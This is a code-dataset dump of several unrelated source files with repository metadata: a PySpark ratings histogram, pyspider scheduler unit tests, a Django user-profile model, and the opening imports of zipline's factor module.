sc = SparkContext(conf = conf)
lines = sc.textFile("D:/celebal/resources/ml-100k/u.data")
ratings = lines.map(lambda x: x.split()[2])
result = ratings.countByValue()
sortedResults = collections.OrderedDict(sorted(result.items()))
for key, value in sortedResults.items():
print("%s %i" % (key, value))
| 31.428571
| 68
| 0.738636
|
from pyspark import SparkConf, SparkContext
import collections
conf = SparkConf().setMaster("local").setAppName("RatingsHistogram")
sc = SparkContext(conf = conf)
lines = sc.textFile("D:/celebal/resources/ml-100k/u.data")
ratings = lines.map(lambda x: x.split()[2])
result = ratings.countByValue()
sortedResults = collections.OrderedDict(sorted(result.items()))
for key, value in sortedResults.items():
print("%s %i" % (key, value))
| true
| true
|
f705402b1b08aa6730ba341cc50c68502d1b99d6
| 17,851
|
py
|
Python
|
tests/test_scheduler.py
|
atlas555/pyspider
|
8f71e0e8d67f03a728cd5ea48fa931f6415e1e10
|
[
"Apache-2.0"
] | 5
|
2015-03-31T13:25:25.000Z
|
2016-03-14T11:17:02.000Z
|
tests/test_scheduler.py
|
e-dorigatti/pyspider
|
8f71e0e8d67f03a728cd5ea48fa931f6415e1e10
|
[
"Apache-2.0"
] | null | null | null |
tests/test_scheduler.py
|
e-dorigatti/pyspider
|
8f71e0e8d67f03a728cd5ea48fa931f6415e1e10
|
[
"Apache-2.0"
] | 1
|
2016-02-17T23:12:47.000Z
|
2016-02-17T23:12:47.000Z
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-08 22:37:13
import os
import time
import shutil
import unittest2 as unittest
import logging
import logging.config
logging.config.fileConfig("pyspider/logging.conf")
from pyspider.scheduler.task_queue import TaskQueue
class TestTaskQueue(unittest.TestCase):
@classmethod
def setUpClass(self):
self.task_queue = TaskQueue()
self.task_queue.rate = 100000
self.task_queue.burst = 100000
self.task_queue.processing_timeout = 0.5
def test_10_put(self):
self.task_queue.put('a3', 0, time.time() + 0.5)
self.task_queue.put('a4', 3, time.time() + 0.2)
self.task_queue.put('a2', 0)
self.task_queue.put('a1', 1)
self.assertEqual(self.task_queue.size(), 4)
def test_20_update(self):
self.task_queue.put('a2', 4)
self.assertEqual(self.task_queue.size(), 4)
self.task_queue.put('a3', 2, 0)
self.assertEqual(self.task_queue.size(), 4)
def test_30_get_from_priority_queue(self):
self.assertEqual(self.task_queue.get(), 'a2')
self.assertEqual(self.task_queue.size(), 4)
def test_40_time_queue_1(self):
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a3')
self.assertEqual(self.task_queue.size(), 4)
def test_50_time_queue_2(self):
time.sleep(0.3)
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a4')
self.assertEqual(self.task_queue.get(), 'a1')
self.assertEqual(self.task_queue.size(), 4)
def test_60_processing_queue(self):
time.sleep(0.5)
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a2')
self.assertEqual(len(self.task_queue), 4)
self.assertEqual(self.task_queue.get(), 'a4')
self.assertEqual(self.task_queue.get(), 'a3')
self.assertEqual(self.task_queue.get(), 'a1')
self.assertEqual(len(self.task_queue), 4)
def test_70_done(self):
self.assertTrue(self.task_queue.done('a2'))
self.assertTrue(self.task_queue.done('a1'))
self.assertEqual(len(self.task_queue), 2)
self.assertTrue(self.task_queue.done('a4'))
self.assertTrue(self.task_queue.done('a3'))
self.assertEqual(len(self.task_queue), 0)
from pyspider.scheduler.token_bucket import Bucket
class TestBucket(unittest.TestCase):
def test_bucket(self):
bucket = Bucket(100, 1000)
self.assertEqual(bucket.get(), 1000)
time.sleep(0.1)
self.assertEqual(bucket.get(), 1000)
bucket.desc(100)
self.assertEqual(bucket.get(), 900)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 910, delta=2)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 920, delta=2)
try:
from six.moves import xmlrpc_client
except ImportError:
import xmlrpclib as xmlrpc_client
from pyspider.scheduler.scheduler import Scheduler
from pyspider.database.sqlite import taskdb, projectdb, resultdb
from pyspider.libs.multiprocessing_queue import Queue
from pyspider.libs.utils import run_in_thread
class TestScheduler(unittest.TestCase):
taskdb_path = './data/tests/task.db'
projectdb_path = './data/tests/project.db'
resultdb_path = './data/tests/result.db'
check_project_time = 1
scheduler_xmlrpc_port = 23333
@classmethod
def setUpClass(self):
shutil.rmtree('./data/tests', ignore_errors=True)
os.makedirs('./data/tests')
def get_taskdb():
return taskdb.TaskDB(self.taskdb_path)
self.taskdb = get_taskdb()
def get_projectdb():
return projectdb.ProjectDB(self.projectdb_path)
self.projectdb = get_projectdb()
def get_resultdb():
return resultdb.ResultDB(self.resultdb_path)
self.resultdb = get_resultdb()
self.newtask_queue = Queue(10)
self.status_queue = Queue(10)
self.scheduler2fetcher = Queue(10)
self.rpc = xmlrpc_client.ServerProxy('http://localhost:%d' % self.scheduler_xmlrpc_port)
def run_scheduler():
scheduler = Scheduler(taskdb=get_taskdb(), projectdb=get_projectdb(),
newtask_queue=self.newtask_queue, status_queue=self.status_queue,
out_queue=self.scheduler2fetcher, data_path="./data/tests/",
resultdb=get_resultdb())
scheduler.UPDATE_PROJECT_INTERVAL = 0.1
scheduler.LOOP_INTERVAL = 0.1
scheduler.INQUEUE_LIMIT = 10
scheduler.DELETE_TIME = 0
scheduler.DEFAULT_RETRY_DELAY = {'': 5}
scheduler._last_tick = int(time.time()) # not dispatch cronjob
run_in_thread(scheduler.xmlrpc_run, port=self.scheduler_xmlrpc_port)
scheduler.run()
self.process = run_in_thread(run_scheduler)
time.sleep(1)
@classmethod
def tearDownClass(self):
if self.process.is_alive():
self.rpc._quit()
self.process.join(5)
assert not self.process.is_alive()
shutil.rmtree('./data/tests', ignore_errors=True)
time.sleep(1)
def test_10_new_task_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
self.assertEqual(self.rpc.size(), 0)
self.assertEqual(len(self.rpc.get_active_tasks()), 0)
def test_20_new_project(self):
self.projectdb.insert('test_project', {
'name': 'test_project',
'group': 'group',
'status': 'TODO',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
def test_30_update_project(self):
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=1)
self.projectdb.update('test_project', status="DEBUG")
time.sleep(0.1)
self.rpc.update_project()
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.assertEqual(task['url'], 'data:,_on_get_info')
def test_34_new_not_used_project(self):
self.projectdb.insert('test_project_not_started', {
'name': 'test_project_not_started',
'group': 'group',
'status': 'RUNNING',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
task = self.scheduler2fetcher.get(timeout=1)
self.assertEqual(task['taskid'], '_on_get_info')
def test_35_new_task(self):
time.sleep(0.2)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
},
})
time.sleep(0.5)
task = self.scheduler2fetcher.get(timeout=10)
self.assertGreater(len(self.rpc.get_active_tasks()), 0)
self.assertIsNotNone(task)
self.assertEqual(task['project'], 'test_project')
self.assertIn('schedule', task)
self.assertIn('fetch', task)
self.assertIn('process', task)
self.assertIn('track', task)
self.assertEqual(task['fetch']['data'], 'abc')
def test_37_force_update_processing_task(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url_force_update',
'schedule': {
'age': 10,
'force_update': True,
},
})
time.sleep(0.2)
# it should not block next
def test_40_taskdone_error_no_project(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'no_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_50_taskdone_error_no_track(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {}
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_60_taskdone_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=4)
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
def test_70_taskdone_ok(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
time.sleep(0.2)
self.assertEqual(self.rpc.size(), 0)
def test_80_newtask_age_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_82_newtask_via_rpc(self):
self.rpc.newtask({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_90_newtask_with_itag(self):
time.sleep(0.1)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'itag': "abc",
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.test_70_taskdone_ok()
def test_a10_newtask_restart_by_age(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a20_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': False
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_a30_task_verify(self):
self.assertFalse(self.rpc.newtask({
#'taskid': 'taskid#',
'project': 'test_project',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
#'project': 'test_project',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
#'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'not_exist_project',
'url': 'url',
}))
self.assertTrue(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
'url': 'url',
}))
def test_a40_success_recrawl(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a50_failed_recrawl(self):
for i in range(3):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a60_disable_recrawl(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_x10_inqueue_limit(self):
self.projectdb.insert('test_inqueue_project', {
'name': 'test_inqueue_project',
'group': 'group',
'status': 'DEBUG',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 0,
'burst': 0,
})
time.sleep(0.1)
pre_size = self.rpc.size()
for i in range(20):
self.newtask_queue.put({
'taskid': 'taskid%d' % i,
'project': 'test_inqueue_project',
'url': 'url',
'schedule': {
'age': 3000,
'force_update': True,
},
})
time.sleep(1)
self.assertEqual(self.rpc.size() - pre_size, 10)
def test_x20_delete_project(self):
self.assertIsNotNone(self.projectdb.get('test_inqueue_project'))
#self.assertIsNotNone(self.taskdb.get_task('test_inqueue_project', 'taskid1'))
self.projectdb.update('test_inqueue_project', status="STOP", group="lock,delete")
time.sleep(1)
self.assertIsNone(self.projectdb.get('test_inqueue_project'))
self.taskdb._list_project()
self.assertIsNone(self.taskdb.get_task('test_inqueue_project', 'taskid1'))
def test_z10_startup(self):
self.assertTrue(self.process.is_alive())
def test_z20_quit(self):
self.rpc._quit()
time.sleep(0.2)
self.assertFalse(self.process.is_alive())
self.assertEqual(
self.taskdb.get_task('test_project', 'taskid')['status'],
self.taskdb.SUCCESS
)
if __name__ == '__main__':
unittest.main()
| 30.671821
| 99
| 0.503893
|
import os
import time
import shutil
import unittest2 as unittest
import logging
import logging.config
logging.config.fileConfig("pyspider/logging.conf")
from pyspider.scheduler.task_queue import TaskQueue
class TestTaskQueue(unittest.TestCase):
@classmethod
def setUpClass(self):
self.task_queue = TaskQueue()
self.task_queue.rate = 100000
self.task_queue.burst = 100000
self.task_queue.processing_timeout = 0.5
def test_10_put(self):
self.task_queue.put('a3', 0, time.time() + 0.5)
self.task_queue.put('a4', 3, time.time() + 0.2)
self.task_queue.put('a2', 0)
self.task_queue.put('a1', 1)
self.assertEqual(self.task_queue.size(), 4)
def test_20_update(self):
self.task_queue.put('a2', 4)
self.assertEqual(self.task_queue.size(), 4)
self.task_queue.put('a3', 2, 0)
self.assertEqual(self.task_queue.size(), 4)
def test_30_get_from_priority_queue(self):
self.assertEqual(self.task_queue.get(), 'a2')
self.assertEqual(self.task_queue.size(), 4)
def test_40_time_queue_1(self):
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a3')
self.assertEqual(self.task_queue.size(), 4)
def test_50_time_queue_2(self):
time.sleep(0.3)
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a4')
self.assertEqual(self.task_queue.get(), 'a1')
self.assertEqual(self.task_queue.size(), 4)
def test_60_processing_queue(self):
time.sleep(0.5)
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a2')
self.assertEqual(len(self.task_queue), 4)
self.assertEqual(self.task_queue.get(), 'a4')
self.assertEqual(self.task_queue.get(), 'a3')
self.assertEqual(self.task_queue.get(), 'a1')
self.assertEqual(len(self.task_queue), 4)
def test_70_done(self):
self.assertTrue(self.task_queue.done('a2'))
self.assertTrue(self.task_queue.done('a1'))
self.assertEqual(len(self.task_queue), 2)
self.assertTrue(self.task_queue.done('a4'))
self.assertTrue(self.task_queue.done('a3'))
self.assertEqual(len(self.task_queue), 0)
from pyspider.scheduler.token_bucket import Bucket
class TestBucket(unittest.TestCase):
def test_bucket(self):
bucket = Bucket(100, 1000)
self.assertEqual(bucket.get(), 1000)
time.sleep(0.1)
self.assertEqual(bucket.get(), 1000)
bucket.desc(100)
self.assertEqual(bucket.get(), 900)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 910, delta=2)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 920, delta=2)
try:
from six.moves import xmlrpc_client
except ImportError:
import xmlrpclib as xmlrpc_client
from pyspider.scheduler.scheduler import Scheduler
from pyspider.database.sqlite import taskdb, projectdb, resultdb
from pyspider.libs.multiprocessing_queue import Queue
from pyspider.libs.utils import run_in_thread
class TestScheduler(unittest.TestCase):
taskdb_path = './data/tests/task.db'
projectdb_path = './data/tests/project.db'
resultdb_path = './data/tests/result.db'
check_project_time = 1
scheduler_xmlrpc_port = 23333
@classmethod
def setUpClass(self):
shutil.rmtree('./data/tests', ignore_errors=True)
os.makedirs('./data/tests')
def get_taskdb():
return taskdb.TaskDB(self.taskdb_path)
self.taskdb = get_taskdb()
def get_projectdb():
return projectdb.ProjectDB(self.projectdb_path)
self.projectdb = get_projectdb()
def get_resultdb():
return resultdb.ResultDB(self.resultdb_path)
self.resultdb = get_resultdb()
self.newtask_queue = Queue(10)
self.status_queue = Queue(10)
self.scheduler2fetcher = Queue(10)
self.rpc = xmlrpc_client.ServerProxy('http://localhost:%d' % self.scheduler_xmlrpc_port)
def run_scheduler():
scheduler = Scheduler(taskdb=get_taskdb(), projectdb=get_projectdb(),
newtask_queue=self.newtask_queue, status_queue=self.status_queue,
out_queue=self.scheduler2fetcher, data_path="./data/tests/",
resultdb=get_resultdb())
scheduler.UPDATE_PROJECT_INTERVAL = 0.1
scheduler.LOOP_INTERVAL = 0.1
scheduler.INQUEUE_LIMIT = 10
scheduler.DELETE_TIME = 0
scheduler.DEFAULT_RETRY_DELAY = {'': 5}
scheduler._last_tick = int(time.time())
run_in_thread(scheduler.xmlrpc_run, port=self.scheduler_xmlrpc_port)
scheduler.run()
self.process = run_in_thread(run_scheduler)
time.sleep(1)
@classmethod
def tearDownClass(self):
if self.process.is_alive():
self.rpc._quit()
self.process.join(5)
assert not self.process.is_alive()
shutil.rmtree('./data/tests', ignore_errors=True)
time.sleep(1)
def test_10_new_task_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
self.assertEqual(self.rpc.size(), 0)
self.assertEqual(len(self.rpc.get_active_tasks()), 0)
def test_20_new_project(self):
self.projectdb.insert('test_project', {
'name': 'test_project',
'group': 'group',
'status': 'TODO',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
def test_30_update_project(self):
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=1)
self.projectdb.update('test_project', status="DEBUG")
time.sleep(0.1)
self.rpc.update_project()
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.assertEqual(task['url'], 'data:,_on_get_info')
def test_34_new_not_used_project(self):
self.projectdb.insert('test_project_not_started', {
'name': 'test_project_not_started',
'group': 'group',
'status': 'RUNNING',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
task = self.scheduler2fetcher.get(timeout=1)
self.assertEqual(task['taskid'], '_on_get_info')
def test_35_new_task(self):
time.sleep(0.2)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
},
})
time.sleep(0.5)
task = self.scheduler2fetcher.get(timeout=10)
self.assertGreater(len(self.rpc.get_active_tasks()), 0)
self.assertIsNotNone(task)
self.assertEqual(task['project'], 'test_project')
self.assertIn('schedule', task)
self.assertIn('fetch', task)
self.assertIn('process', task)
self.assertIn('track', task)
self.assertEqual(task['fetch']['data'], 'abc')
def test_37_force_update_processing_task(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url_force_update',
'schedule': {
'age': 10,
'force_update': True,
},
})
time.sleep(0.2)
def test_40_taskdone_error_no_project(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'no_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_50_taskdone_error_no_track(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {}
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_60_taskdone_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=4)
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
def test_70_taskdone_ok(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
time.sleep(0.2)
self.assertEqual(self.rpc.size(), 0)
def test_80_newtask_age_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_82_newtask_via_rpc(self):
self.rpc.newtask({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_90_newtask_with_itag(self):
time.sleep(0.1)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'itag': "abc",
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.test_70_taskdone_ok()
def test_a10_newtask_restart_by_age(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a20_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': False
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_a30_task_verify(self):
self.assertFalse(self.rpc.newtask({
'project': 'test_project',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'not_exist_project',
'url': 'url',
}))
self.assertTrue(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
'url': 'url',
}))
def test_a40_success_recrawl(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a50_failed_recrawl(self):
for i in range(3):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a60_disable_recrawl(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_x10_inqueue_limit(self):
self.projectdb.insert('test_inqueue_project', {
'name': 'test_inqueue_project',
'group': 'group',
'status': 'DEBUG',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 0,
'burst': 0,
})
time.sleep(0.1)
pre_size = self.rpc.size()
for i in range(20):
self.newtask_queue.put({
'taskid': 'taskid%d' % i,
'project': 'test_inqueue_project',
'url': 'url',
'schedule': {
'age': 3000,
'force_update': True,
},
})
time.sleep(1)
self.assertEqual(self.rpc.size() - pre_size, 10)
def test_x20_delete_project(self):
self.assertIsNotNone(self.projectdb.get('test_inqueue_project'))
self.projectdb.update('test_inqueue_project', status="STOP", group="lock,delete")
time.sleep(1)
self.assertIsNone(self.projectdb.get('test_inqueue_project'))
self.taskdb._list_project()
self.assertIsNone(self.taskdb.get_task('test_inqueue_project', 'taskid1'))
def test_z10_startup(self):
self.assertTrue(self.process.is_alive())
def test_z20_quit(self):
self.rpc._quit()
time.sleep(0.2)
self.assertFalse(self.process.is_alive())
self.assertEqual(
self.taskdb.get_task('test_project', 'taskid')['status'],
self.taskdb.SUCCESS
)
if __name__ == '__main__':
unittest.main()
| true
| true
|
f7054098e4be98d0e7ded502ff3e25b7159a4400
| 2,065
|
py
|
Python
|
profiles_api/models.py
|
tanveerahmaddar/profiles-rest-api
|
1fd5060677bbefd6bb2d02179587a1d8005f3bc1
|
[
"MIT"
] | null | null | null |
profiles_api/models.py
|
tanveerahmaddar/profiles-rest-api
|
1fd5060677bbefd6bb2d02179587a1d8005f3bc1
|
[
"MIT"
] | 5
|
2021-03-19T12:00:14.000Z
|
2022-02-10T09:29:53.000Z
|
profiles_api/models.py
|
tanveerahmaddar/profiles-rest-api
|
1fd5060677bbefd6bb2d02179587a1d8005f3bc1
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
from django.conf import settings
class UserProfileManager(BaseUserManager):
"""Manager for user profiles"""
def create_user(self, email, name, password=None):
"""create a new user profile"""
if not email:
raise ValueError("User must have and email address")
email = self.normalize_email(email)
user = self.model(email=email,name=name)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, name, password):
"""create and save new superuser with given details"""
user = self.create_user(email, name, password)
user.is_superuser = True
user.is_staff = True
user.save(using=self._db)
return user
class UserProfile(AbstractBaseUser,PermissionsMixin):
"""Database model for users in the system """
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserProfileManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['name']
def get_full_name(self):
"""Retrieve full name of user"""
return self.name
def get_short_name(self):
"""Retrieve short name of user"""
return self.name
def __str__(self):
"""Return string representation of our user"""
return self.email
class ProfileFeedItem(models.Model):
"""Profile status update"""
user_profile = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
status_text = models.CharField(max_length=255)
created_on = models.DateTimeField(auto_now_add=True)
def __str__(self):
"""Retusnt the model as a string"""
return self.status_text
| 28.287671
| 64
| 0.680872
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
from django.conf import settings
class UserProfileManager(BaseUserManager):
def create_user(self, email, name, password=None):
if not email:
raise ValueError("User must have and email address")
email = self.normalize_email(email)
user = self.model(email=email,name=name)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, name, password):
user = self.create_user(email, name, password)
user.is_superuser = True
user.is_staff = True
user.save(using=self._db)
return user
class UserProfile(AbstractBaseUser,PermissionsMixin):
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserProfileManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['name']
def get_full_name(self):
return self.name
def get_short_name(self):
return self.name
def __str__(self):
return self.email
class ProfileFeedItem(models.Model):
user_profile = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
status_text = models.CharField(max_length=255)
created_on = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.status_text
| true
| true
|
f70541311d2804278f3802c1efeec5ac64b356ca
| 41,783
|
py
|
Python
|
zipline/pipeline/factors/factor.py
|
degiere/zipline
|
bc0b117dc94b8e93081818964e3b1bdbf9b33abb
|
[
"Apache-2.0"
] | null | null | null |
zipline/pipeline/factors/factor.py
|
degiere/zipline
|
bc0b117dc94b8e93081818964e3b1bdbf9b33abb
|
[
"Apache-2.0"
] | null | null | null |
zipline/pipeline/factors/factor.py
|
degiere/zipline
|
bc0b117dc94b8e93081818964e3b1bdbf9b33abb
|
[
"Apache-2.0"
] | 1
|
2019-09-20T01:08:33.000Z
|
2019-09-20T01:08:33.000Z
|
"""
factor.py
"""
from functools import wraps
from operator import attrgetter
from numbers import Number
from numpy import inf, where
from toolz import curry
from zipline.errors import UnknownRankMethod
from zipline.lib.normalize import naive_grouped_rowwise_apply
from zipline.lib.rank import masked_rankdata_2d
